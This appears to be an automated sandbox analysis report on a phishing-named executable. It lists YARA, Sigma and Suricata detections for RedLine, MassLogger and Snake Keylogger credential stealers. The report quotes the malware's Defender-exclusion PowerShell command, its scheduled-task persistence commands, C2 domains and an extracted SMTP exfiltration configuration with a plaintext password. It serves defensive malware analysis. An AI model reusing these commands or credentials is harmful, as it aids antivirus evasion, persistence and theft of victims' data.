0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4057ae0.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.zeXKjViL.exe.40802a8.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.49e3d90.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.5ae0000.14.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x283fd:$a1: get_encryptedPassword 0x4061d:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0x28739:$a2: get_encryptedUsername 0x40959:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x2818a:$a3: get_timePasswordChanged 0x403aa:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x282ab:$a4: get_passwordField 0x404cb:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x28413:$a5: set_encryptedPassword 0x40633:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x29de3:$a7: get_logins 0x42003:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x29a94:$a8: GetOutlookPasswords 0x41cb4:$a8: GetOutlookPasswords
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a3cfc0.11.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d653:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x45873:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x2cb51:$a3: \Google\Chrome\User Data\Default\Login Data 0x44d71:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x2ce5f:$a4: \Orbitum\User Data\Default\Login Data 0x4507f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data 0x2dc57:$a5: \Kometa\User Data\Default\Login Data 0x45e77:$a5: \Kometa\User Data\Default\Login Data
10.2.zeXKjViL.exe.40802a8.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1660a0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x166720:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700000.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a6d410.10.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3700f08.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.PO_2024_056209_MQ04865_ENQ_1045.exe.3eedac0.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1bcb0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1660a0:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x166720:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1d98a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1d5d0:$s5: delete[] 0x1ca88:$s6: constructor or from DllMain.
Click to see the 55 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ProcessId: 7900, ProcessName: powershell.exe

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\AppVStrm.sys, NewProcessName: C:\Windows\System32\drivers\AppVStrm.sys, OriginalFileName: C:\Windows\System32\drivers\AppVStrm.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: AppVStrm.sys

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ProcessId: 3448, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\apihost.exe.lnk

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f, CommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe, ParentProcessId: 3448, ParentProcessName: Trading_AIBot.exe, ProcessCommandLine: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 03:10 /du 23:59 /sc daily /ri 1 /f, ProcessId: 7472, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", ProcessId: 8020, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ProcessId: 7900, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe", ParentImage: C:\Users\user\Desktop\PO_2024_056209_MQ04865_ENQ_1045.exe, ParentProcessId: 7708, ParentProcessName: PO_2024_056209_MQ04865_ENQ_1045.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\zeXKjViL" /XML "C:\Users\user\AppData\Local\Temp\tmp29D3.tmp", ProcessId: 8020, ProcessName: schtasks.exe

Suricata Signatures

ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:05:14.023229+0100	2051649	1	A Network Trojan was detected	192.168.2.4	63397	1.1.1.1	53	UDP

ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:05:11.347551+0100	2051648	1	A Network Trojan was detected	192.168.2.4	57418	1.1.1.1	53	UDP
2024-12-31T09:05:29.912750+0100	2051648	1	A Network Trojan was detected	192.168.2.4	51179	1.1.1.1	53	UDP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:05:07.955302+0100	2018141	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49739	TCP
2024-12-31T09:05:09.556816+0100	2018141	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49742	TCP
2024-12-31T09:05:11.324424+0100	2018141	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49745	TCP
2024-12-31T09:06:04.494974+0100	2018141	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49789	TCP
2024-12-31T09:06:06.454454+0100	2018141	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49800	TCP
2024-12-31T09:06:11.794660+0100	2018141	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49841	TCP
2024-12-31T09:06:12.339406+0100	2018141	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.4	49847	TCP
2024-12-31T09:06:17.574514+0100	2018141	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.4	49883	TCP
2024-12-31T09:06:18.396184+0100	2018141	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49891	TCP
2024-12-31T09:06:24.548434+0100	2018141	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.4	49927	TCP

ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:05:07.955302+0100	2037771	1	A Network Trojan was detected	54.244.188.177	80	192.168.2.4	49739	TCP
2024-12-31T09:05:09.556816+0100	2037771	1	A Network Trojan was detected	18.141.10.107	80	192.168.2.4	49742	TCP
2024-12-31T09:05:11.324424+0100	2037771	1	A Network Trojan was detected	44.221.84.105	80	192.168.2.4	49745	TCP
2024-12-31T09:06:04.494974+0100	2037771	1	A Network Trojan was detected	47.129.31.212	80	192.168.2.4	49789	TCP
2024-12-31T09:06:06.454454+0100	2037771	1	A Network Trojan was detected	13.251.16.150	80	192.168.2.4	49800	TCP
2024-12-31T09:06:11.794660+0100	2037771	1	A Network Trojan was detected	34.246.200.160	80	192.168.2.4	49841	TCP
2024-12-31T09:06:12.339406+0100	2037771	1	A Network Trojan was detected	34.227.7.138	80	192.168.2.4	49847	TCP
2024-12-31T09:06:17.574514+0100	2037771	1	A Network Trojan was detected	35.164.78.200	80	192.168.2.4	49883	TCP
2024-12-31T09:06:18.396184+0100	2037771	1	A Network Trojan was detected	3.94.10.34	80	192.168.2.4	49891	TCP
2024-12-31T09:06:24.548434+0100	2037771	1	A Network Trojan was detected	18.246.231.120	80	192.168.2.4	49927	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:05:20.949994+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	132.226.8.169	80	TCP

ETPRO MALWARE Win32/Expiro.NDO CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-31T09:05:30.561464+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49757	72.52.178.23	80	TCP
2024-12-31T09:06:53.680062+0100	2850851	1	Malware Command and Control Activity Detected	192.168.2.4	49938	54.244.188.177	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://ww12.przvgke.biz/ewl?usid=27&utid=10221865931-	Avira URL Cloud: Label: malware
Source: http://ww7.przvgke.biz/ehlglgm?usid=27&utid=10221870153	Avira URL Cloud: Label: malware
Source: http://ww7.fwiwk.biz/m?usid=27&utid=10221880067	Avira URL Cloud: Label: phishing

Antivirus detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe	Avira: detection malicious, Label: W32/Infector.Gen

Found malware configuration

Source: 8.2.PO_2024_056209_MQ04865_ENQ_1045.exe.4a551f0.12.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Multi AV Scanner detection for submitted file

Source: PO_2024_056209_MQ04865_ENQ_1045.exe

ReversingLabs: Detection: 42%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Joe Sandbox ML: detected
